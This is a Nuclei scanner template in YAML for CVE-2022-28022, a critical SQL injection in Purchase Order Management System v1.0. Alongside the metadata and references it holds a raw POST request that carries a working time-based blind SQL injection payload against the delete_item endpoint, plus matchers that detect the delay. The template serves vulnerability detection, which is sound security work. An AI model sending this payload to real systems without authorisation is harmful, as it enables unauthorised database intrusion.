49 lines
1.9 KiB
YAML
49 lines
1.9 KiB
YAML
id: CVE-2022-28022
|
|
|
|
info:
|
|
name: Purchase Order Management v1.0 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.
|
|
remediation: |
|
|
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.
|
|
reference:
|
|
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md
|
|
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-28022
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-28022
|
|
cwe-id: CWE-89
|
|
epss-score: 0.01192
|
|
epss-percentile: 0.8352
|
|
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: purchase_order_management_system_project
|
|
product: purchase_order_management_system
|
|
tags: cve,cve2022,sqli,purchase-order-management-system
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /classes/Master.php?f=delete_item HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
id=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(header, "text/html")'
|
|
- 'contains(body, "status\":\"success")'
|
|
condition: and
|
|
|
|
# digest: 490a00463044022030dd9139c34711c50b4bd4f9c1f9dbf40731cf65ad9b5b70dcbfa01688af4ac802202351f74d5901ba93f8682c1496ac2d88e2cd8b3081516f92ba6e2d4395954262:922c64590222798bb761d5b6d8e72950
|